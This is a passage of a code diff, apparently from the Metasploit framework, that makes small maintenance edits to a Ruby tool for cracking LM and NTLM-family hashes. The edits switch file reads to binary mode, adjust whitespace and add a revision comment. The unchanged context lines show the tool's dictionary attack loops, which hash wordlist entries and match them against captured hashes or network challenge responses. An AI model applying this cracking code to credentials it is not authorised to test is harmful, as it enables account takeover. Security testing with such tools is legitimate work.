+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
if password =~ /^.{1,14}$/
@@ -190,7 +190,7 @@ when "LM"
match_password = password
break
end
- end
+ end
end
end
if found
@@ -236,7 +236,7 @@ when "NTLM"
end
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
puts password
@@ -245,7 +245,7 @@ when "NTLM"
found = true
match_password = password
break
- end
+ end
end
end
if found
@@ -290,7 +290,7 @@ when "HALFNETLMv1"
end
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
if password =~ /^.{1,7}$/
@@ -304,7 +304,7 @@ when "HALFNETLMv1"
match_password = password
break
end
- end
+ end
end
end
if found
@@ -380,7 +380,7 @@ when "NETLMv1"
end
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
if password =~ /^.{1,14}$/
@@ -392,7 +392,7 @@ when "NETLMv1"
found = true
match_password = password
break
- end
+ end
end
end
end
@@ -404,7 +404,7 @@ when "NETLMv1"
exit
end
when HASH_MODE
- if not pass =~ /^.{1,14}$/
+ if not pass =~ /^.{1,14}$/
$stderr.puts "[*] NETLMv1 password can not be bigger then 14 characters"
exit
end
@@ -423,7 +423,7 @@ when "NETLMv1"
puts "[*] The NETLMv1 hash for #{pass.upcase} is : #{calculatedhash}"
exit
when PASS_MODE
- if not pass =~ /^.{1,14}$/
+ if not pass =~ /^.{1,14}$/
$stderr.puts "[*] NETLMv1 password can not be bigger then 14 characters"
exit
end
@@ -468,18 +468,18 @@ when "NETNTLMv1"
end
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
puts password
- argntlm = { :ntlm_hash => CRYPT::ntlm_hash(password),
+ argntlm = { :ntlm_hash => CRYPT::ntlm_hash(password),
:challenge => [ srvchal ].pack("H*") }
calculatedhash = CRYPT::ntlm_response(argntlm).unpack("H*")[0].upcase
if calculatedhash == hash.upcase
found = true
match_password = password
break
- end
+ end
end
end
if found
@@ -498,7 +498,7 @@ when "NETNTLMv1"
$stderr.puts "[*] Server challenge must be exactly 16 bytes of hexadecimal"
exit
end
- argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass),
+ argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass),
:challenge => [ srvchal ].pack("H*") }
calculatedhash = CRYPT::ntlm_response(argntlm).unpack("H*")[0].upcase
puts "[*] The NETNTLMv1 hash for #{pass} is : #{calculatedhash}"
@@ -516,7 +516,7 @@ when "NETNTLMv1"
$stderr.puts "[*] Server challenge must be exactly 16 bytes of hexadecimal"
exit
end
- argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass),
+ argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass),
:challenge => [ srvchal ].pack("H*") }
calculatedhash = CRYPT::ntlm_response(argntlm).unpack("H*")[0].upcase
@@ -554,21 +554,21 @@ when "NETNTLM2_SESSION"
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
puts password
- argntlm = { :ntlm_hash => CRYPT::ntlm_hash(password),
+ argntlm = { :ntlm_hash => CRYPT::ntlm_hash(password),
:challenge => [ srvchal ].pack("H*") }
optntlm = { :client_challenge => [ clichal ].pack("H*")}
calculatedhash = CRYPT::ntlm2_session(argntlm,optntlm).join[24,24].unpack("H*")[0].upcase
-
+
if calculatedhash == hash.upcase
found = true
match_password = password
break
- end
+ end
end
end
if found
@@ -595,7 +595,7 @@ when "NETNTLM2_SESSION"
$stderr.puts "[*] Client challenge must be exactly 16 bytes of hexadecimal"
exit
end
- argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass),
+ argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass),
:challenge => [ srvchal ].pack("H*") }
optntlm = { :client_challenge => [ clichal ].pack("H*")}
@@ -623,7 +623,7 @@ when "NETNTLM2_SESSION"
$stderr.puts "[*] Client challenge must be exactly 16 bytes of hexadecimal"
exit
end
- argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass),
+ argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass),
:challenge => [ srvchal ].pack("H*") }
optntlm = { :client_challenge => [ clichal ].pack("H*")}
@@ -671,7 +671,7 @@ when "NETLMv2"
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
puts password
@@ -683,7 +683,7 @@ when "NETLMv2"
found = true
match_password = password
break
- end
+ end
end
end
if found
@@ -802,7 +802,7 @@ when "NETNTLMv2"
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
puts password
@@ -815,7 +815,7 @@ when "NETNTLMv2"
found = true
match_password = password
break
- end
+ end
end
end
if found
diff --git a/tools/vxdigger.rb b/tools/vxdigger.rb
index 99e2df9b53..f5784a8092 100755
--- a/tools/vxdigger.rb
+++ b/tools/vxdigger.rb
@@ -9,6 +9,8 @@
#
# (C) 2010 Rapid7
#
+# $Revision$
+#
def usage
$stderr.puts "usage: #{$0} [dump-file]